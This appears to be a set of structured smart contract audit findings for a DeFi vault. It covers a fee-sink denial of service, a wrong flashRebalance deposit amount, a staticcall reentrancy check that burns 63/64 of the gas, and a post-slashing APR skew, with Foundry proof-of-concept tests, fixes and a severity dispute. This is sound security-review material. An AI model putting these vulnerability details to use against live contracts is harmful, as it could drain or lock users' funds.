`_collectFees` mints shares to `feeSink`.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n\\n`_mint` calls `_beforeTokenTransfer` internally to check if the target wallet exceeds `perWalletLimit`.\\n```\\nfunction _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override whenNotPaused {\\n // rest of code.\\n if (balanceOf(to) + amount > perWalletLimit) {\\n revert OverWalletLimit(to);\\n }\\n}\\n```\\n\\nThe `_collectFees` function will revert if `balanceOf(feeSink) + fee shares > perWalletLimit`. `updateDebtReporting`, `rebalance` and `flashRebalance` call `_collectFees` internally, so they will be non-functional.
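The DoS condition is a simple accounting check. Below is an illustrative Python model (limit and balances are made-up numbers): once the sink's balance reaches the cap, every subsequent fee mint reverts, and with it every function that routes through `_collectFees`.

```python
PER_WALLET_LIMIT = 1_000

balances = {"feeSink": 995}

def mint(to, amount):
    # Analogue of _beforeTokenTransfer enforcing the per-wallet cap on mint.
    if balances.get(to, 0) + amount > PER_WALLET_LIMIT:
        raise RuntimeError("OverWalletLimit")
    balances[to] = balances.get(to, 0) + amount

def collect_fees(fee_shares):
    # Called on the updateDebtReporting / rebalance / flashRebalance paths.
    mint("feeSink", fee_shares)

collect_fees(5)              # fills the sink exactly to the limit
try:
    collect_fees(1)          # any further fee mint now reverts
    dos = False
except RuntimeError:
    dos = True
```

Because the revert happens inside a shared internal function, the protocol cannot even rebalance its way out; hence the recommendation to exempt `feeSink` from `perWalletLimit`.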
Allow `feeSink` to exceeds `perWalletLimit`.
`updateDebtReporting`, `rebalance` and `flashRebalance` won't be working if `feeSink` balance hits `perWalletLimit`.
```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n
Incorrect amount given as input to `_handleRebalanceIn` when `flashRebalance` is called
medium
The issue occurs in the `flashRebalance` function below :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming "In", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get "before" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the "out" assets\\n // and get our "in" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256("ERC3156FlashBorrower.onFlashLoan")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nAs we can see from the code above, the function executes a flashloan in order to 
receive the tokenIn amount, which should be the difference between `tokenInBalanceAfter` (balance of the contract after the flashloan) and `tokenInBalanceBefore` (balance of the contract before the flashloan): `tokenInBalanceAfter - tokenInBalanceBefore`.\\nBut when calling the `_handleRebalanceIn` function the wrong deposit amount is given as input, as the total balance `tokenInBalanceAfter` is used instead of the received amount `tokenInBalanceAfter - tokenInBalanceBefore`.\\nBecause the `_handleRebalanceIn` function is supposed to deposit the input amount to the destination vault, this error can result in sending a larger amount of funds to the DV than was intended, or it can cause a DOS of the `flashRebalance` function (due to an insufficient-amount error when performing the transfer to the DV). All of this will make the rebalance operation fail (or not be done correctly), which can have a negative impact on the LMPVault.
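A quick sketch with assumed balances makes the gap between the amount passed and the amount actually received concrete:

```python
# Illustrative balances (assumed): the vault already holds some tokenIn
# before the flashloan, so passing the TOTAL balance instead of the DELTA
# inflates the amount handed to _handleRebalanceIn.

token_in_balance_before = 50      # pre-existing vault balance
solver_sends = 100                # what the solver actually delivers
token_in_balance_after = token_in_balance_before + solver_sends

wrong_amount = token_in_balance_after                               # what the code passes
correct_amount = token_in_balance_after - token_in_balance_before   # what it should pass

assert wrong_amount == 150 and correct_amount == 100
# _handleRebalanceIn would try to deposit 150 tokens although only 100 were
# received, overstating debt or reverting on an insufficient-balance transfer.
```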
Use the correct received tokenIn amount `tokenInBalanceAfter - tokenInBalanceBefore` as input to the `_handleRebalanceIn` function :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming "In", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get "before" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the "out" assets\\n // and get our "in" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256("ERC3156FlashBorrower.onFlashLoan")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit Use `tokenInBalanceAfter - tokenInBalanceBefore` as input\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter - tokenInBalanceBefore);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n
See summary
```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming "In", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get "before" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the "out" assets\\n // and get our "in" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256("ERC3156FlashBorrower.onFlashLoan")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n
OOG / unexpected reverts due to incorrect usage of staticcall.
medium
The function `checkReentrancy` in `BalancerUtilities.sol` is used to check if the balancer contract has been re-entered or not. It does this by doing a `staticcall` on the pool contract and checking the return value. According to the solidity docs, if a `staticcall` encounters a state change, it burns up all gas and returns. The `checkReentrancy` tries to call `manageUserBalance` on the vault contract, and returns if it finds a state change.\\nThe issue is that this burns up all the gas sent with the call. According to EIP150, a call gets allocated 63/64 of the gas, and that entire 63/64 of the gas is burnt up after the staticcall, since the staticcall will always encounter a storage change. This is also highlighted in the balancer monorepo, which has guidelines on how to check re-entrancy here.\\nThis can also be shown with a simple POC.\\n```\\nfunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n 
});\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint("Gas before price1", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint("price1", price1);\\n emit log_named_uint("Gas after price1 ", gasleft());\\n }\\n```\\n\\nThe oracle is called to get a price. This oracle calls the `checkReentrancy` function and burns up the gas. The gas left is checked before and after this call.\\nThe output shows this:\\n```\\n[PASS] testAttack() (gas: 9203730962297323943)\\nLogs:\\nGas before price1: 9223372036854745204\\nprice1: 1006294352158612428\\nGas after price1 : 425625349158468958\\n```\\n\\nThis shows that 96% of the gas sent is burnt up in the oracle call.
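Roughly, the EIP-150 63/64 rule means almost all remaining gas is forwarded to, and then burnt by, the failing staticcall. A back-of-the-envelope check (reusing the gas figure from the log above):

```python
# Back-of-the-envelope EIP-150 math: a CALL/STATICCALL forwards at most
# 63/64 of the remaining gas, and a state-change attempt in a static
# context consumes everything that was forwarded. Gas figure is taken
# from the POC log above; the split itself is illustrative.

gas_before = 9_223_372_036_854_745_204  # "Gas before price1" from the log

forwarded = gas_before * 63 // 64       # burnt entirely by the failing staticcall
retained = gas_before - forwarded       # the 1/64 the caller keeps

print(f"fraction burnt: {forwarded / gas_before:.4f}")  # ~0.9844, i.e. 63/64
assert forwarded / gas_before > 0.98
```

This matches the ~96% figure measured in the POC (the remaining gap is gas spent before and after the staticcall itself).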
According to the monorepo here, the staticcall must be allocated a fixed amount of gas. Change the reentrancy check to the following.\\n```\\n(, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(\\n abi.encodeWithSelector(vault.manageUserBalance.selector, 0)\\n );\\n```\\n\\nThis ensures gas isn't burnt up without reason.
This causes the contract to burn up 63/64 of the gas in a single check. If there are lots of operations after this call, the call can revert due to running out of gas. This can lead to a DOS of the contract.\\nCurrent opinion is to reject escalation and keep issue medium severity.\\nJeffCX\\nPutting a limit on the gas is not a task for the protocol\\nsir, please read the report again, the flawed logic in the code charge user 100x gas in every transaction in every withdrawal\\nin a single transaction, the cost burnt can by minimal\\nidk how do state it more clearly, emm if you put money in the bank, you expect to pay 1 USD for withdrawal transaction fee, but every time you have to pay 100 USD withdrawal fee because of the bug\\nthis cause loss of fund for every user in every transaction for not only you but every user...\\nEvert0x\\n@JeffCX what are the exact numbers on the withdrawal costs? E.g. if I want to withdraw $10k, how much gas can I expect to pay? If this is a significant amount I can see the argument for\\nHow to identify a high issue: Definite loss of funds without limiting external conditions.\\nBut it's not clear how much this will be assuming current mainnet conditions.\\nJeffCX\\nI write a simple POC\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport "forge-std/Test.sol";\\nimport "forge-std/console.sol";\\n\\nimport "@openzeppelin/contracts/token/ERC20/ERC20.sol";\\n\\ncontract MockERC20 is ERC20 {\\n constructor()ERC20("MyToken", "MTK")\\n {}\\n\\n function mint(address to, uint256 amount) public {\\n _mint(to, amount);\\n }\\n}\\n\\ninterface ICheckRetrancy {\\n function checkRentrancy() external;\\n}\\n\\ncontract RentrancyCheck {\\n\\n\\n uint256 state = 10;\\n\\n function checkRentrancy() external {\\n address(this).staticcall(abi.encodeWithSignature("hihi()"));\\n }\\n\\n function hihi() public {\\n state = 11;\\n }\\n\\n}\\n\\ncontract Vault {\\n\\n address balancerAddr;\\n bool checkRentrancy;\\n\\n 
constructor(bool _checkRentrancy, address _balancerAddr) {\\n checkRentrancy = _checkRentrancy;\\n balancerAddr = _balancerAddr;\\n }\\n\\n function toggleCheck(bool _state) public {\\n checkRentrancy = _state;\\n }\\n\\n function withdraw(address token, uint256 amount) public {\\n\\n if(checkRentrancy) {\\n ICheckRetrancy(balancerAddr).checkRentrancy();\\n }\\n\\n IERC20(token).transfer(msg.sender, amount);\\n \\n }\\n\\n}\\n\\n\\ncontract CounterTest is Test {\\n\\n using stdStorage for StdStorage;\\n StdStorage stdlib;\\n\\n MockERC20 token;\\n Vault vault;\\n RentrancyCheck rentrancyCheck;\\n\\n address user = vm.addr(5201314);\\n\\n function setUp() public {\\n \\n token = new MockERC20();\\n rentrancyCheck = new RentrancyCheck();\\n vault = new Vault(false, address(rentrancyCheck));\\n token.mint(address(vault), 100000000 ether);\\n\\n vm.deal(user, 100 ether);\\n \\n // vault.toggleCheck(true);\\n\\n }\\n\\n function testPOC() public {\\n\\n uint256 gas = gasleft();\\n uint256 amount = 100 ether;\\n vault.withdraw(address(token), amount);\\n console.log(gas - gasleft());\\n\\n }\\n\\n}\\n```\\n\\nthe call is\\n```\\nif check reentrancy flag is true\\n\\nuser withdraw -> \\ncheck reentrancy staticall revert and consume most of the gas \\n-> withdraw completed\\n```\\n\\nor\\n```\\nif check reentrancy flag is false\\n\\nuser withdraw ->\\n-> withdraw completed\\n```\\n\\nnote first we do not check the reentrancy\\n```\\n// vault.toggleCheck(true);\\n```\\n\\nwe run\\nthe gas cost is 42335\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 45438)\\nLogs:\\n 42335\\n```\\n\\nthen we uncomment the vault.toggleCheck(true) and check the reentrancy that revert in staticcall\\n```\\nvault.toggleCheck(true);\\n```\\n\\nwe run the same test again, this is the output, as we can see the gas cost surge\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 9554791)\\nLogs:\\n 9551688\\n```\\n\\nthen we can use 
this Python script to estimate how much gas is overpaid as lost funds\\n```\\nregular = 42313\\n\\noverpaid = 9551666\\n\\n\\ncost = 0.000000045 * (overpaid - regular);\\n\\nprint(cost)\\n```\\n\\nthe cost is\\n```\\n0.427920885 ETH\\n```\\n\\nin a single withdraw, assume user lost 0.427 ETH,\\nif 500 user withdraw 20 times each and the total number of transaction is 10000\\nthe loss on gas is 10000 * 0.427 ETH\\nJeffCX\\nnote that the more gas limit user set, the more fund user lose in gas\\nbut we are interested in the lowest gas limit a user can set to pay for the withdrawal transaction\\nI did some fuzzing\\nthat number is 1800000 units of gas\\nthe command to run the test is\\nsetting gas limit lower than 1800000 units of gas is likely to revert in out of gas\\nunder this setting, the overpaid transaction cost is 1730089\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 1733192)\\nLogs:\\n 1730089\\n```\\n\\nin other words,\\nin each withdrawal for every user, user can lose 0.073 ETH, (1730089 units of gas * 45 gwei -> 0.000000045 ETH)\\nassume there are 1000 user, each withdraw 10 times, they make 1000 * 10 = 10_000 transactions\\nso the total loss is 10_000 * 0.07 = 700 ETH\\nin reality the gas is more than that because user may use more than 1800000 units of gas to finalize the withdrawal transaction\\nEvert0x\\n@JeffCX thanks for putting in the effort to make this estimation.\\nBut as far as I can see, your estimation doesn't use the actual contracts in scope. But maybe that's irrelevant to make your point.\\nThis seems like the key sentence\\nin each withdrawal for every user, user can lose 0.073 ETH,\\nThis is an extra $100-$150 dollars per withdrawal action.\\nThis is not a very significant amount in my opinion. I assume an optimized withdrawal transaction will cost between $20-$50. 
So the difference is not as big.\\nJeffCX\\nSir, I don't think the method A and method B example applies in the codebase and in this issue\\nthere is only one method for user to withdraw share from the vault\\nI can add more detail to explain how this impacts withdrawals using a top-down approach\\nUser can withdraw by calling withdraw in LMPVault.sol and triggers _withdraw\\nthe _withdraw calls the method _calcUserWithdrawSharesToBurn\\nthis calls LMPDebt._calcUserWithdrawSharesToBurn\\nwe need to know the debt value by calling destVault.debtValue\\nthis calls this line of code\\nthis calls the oracle code\\n`uint256 price = _systemRegistry.rootPriceOracle().getPriceInEth(_underlying);`\\nthen if the dest vault is the balancer vault, the balancer reentrancy check is triggered, wasting 63/64 of the gas in the oracle code\\nso there is no function A and function B call\\nas long as user can withdraw and wants to withdraw share from balancer vault, 100x gas overpayment is required\\nthe POC is a simplified flow of this\\nit is ok to disagree sir:)\\nEvert0x\\nResult: Medium Has Duplicates\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nJEFFCX: rejected
```\\nfunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint("Gas before price1", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint("price1", price1);\\n emit log_named_uint("Gas after price1 ", gasleft());\\n }\\n```\\n
Slashing during `LSTCalculatorBase.sol` deployment can show bad apr for months
medium
The contract `LSTCalculatorBase.sol` has some functions to calculate the rough APR expected from a liquid staking token. The contract is first deployed, and the first snapshot is taken after `APR_FILTER_INIT_INTERVAL_IN_SEC`, which is 9 days. It then calculates the APR between deployment and this first snapshot, and uses that to initialize the APR value. It uses the function `calculateAnnualizedChangeMinZero` to do this calculation.\\nThe issue is that the function `calculateAnnualizedChangeMinZero` has a floor of 0. So if the backing of the LST decreases over those 9 days due to a slashing event in that interval, this function will return 0, and the initial APR and `baseApr` will be set to 0.\\nThe calculator is designed to update the APR at regular intervals of 3 days. However, the new APR is given a weight of 10% and the older APR a weight of 90%, as seen below.\\n```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n\\nAnd alpha is hardcoded to 0.1. So if the initial APR starts at 0 due to a slashing event in the initial 9-day period, a large number of updates will be required to bring the APR up to the correct value.\\nAssuming a correct APR of 6% and an initial APR of 0%, we can calculate that it takes up to ~28 updates to get close to the correct APR. This translates to 84 days, so the wrong APR can be shown for up to 3 months. The protocol uses these APR values to justify the allocation to the various protocols. Thus a wrong APR for months would mean the protocol sub-optimally allocates funds for months, losing potential yield.
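The convergence claim can be sanity-checked with a short simulation of the EMA update (alpha = 0.1 as hardcoded in the calculator); the 6% target and 5% tolerance are illustrative assumptions:

```python
# Simulate the APR EMA recovering from 0 after a slashing event during
# the initial window. ALPHA matches the hardcoded 0.1; the true APR and
# the convergence tolerance are assumed for illustration.

ALPHA = 0.1
TRUE_APR = 0.06  # assumed "correct" APR

apr = 0.0        # initial APR zeroed by calculateAnnualizedChangeMinZero
updates = 0
while apr < 0.95 * TRUE_APR:  # until within 5% of the true value
    # mirrors: (priorValue * (1e18 - alpha) + currentValue * alpha) / 1e18
    apr = apr * (1 - ALPHA) + TRUE_APR * ALPHA
    updates += 1

print(updates, round(apr, 4))
# ~29 snapshots at one every 3 days -> roughly 85-90 days of bad APR,
# consistent with the ~28-update / ~3-month figure above
assert 25 <= updates <= 30
```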
It is recommended to initialize the APR with a specified value, rather than calculating it over the initial 9 days. A 9-day window is not long enough to get an accurate APR, and can be easily skewed by a single slashing event.
The protocol can underperform for months due to slashing events messing up APR calculations close to deployment date.
```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n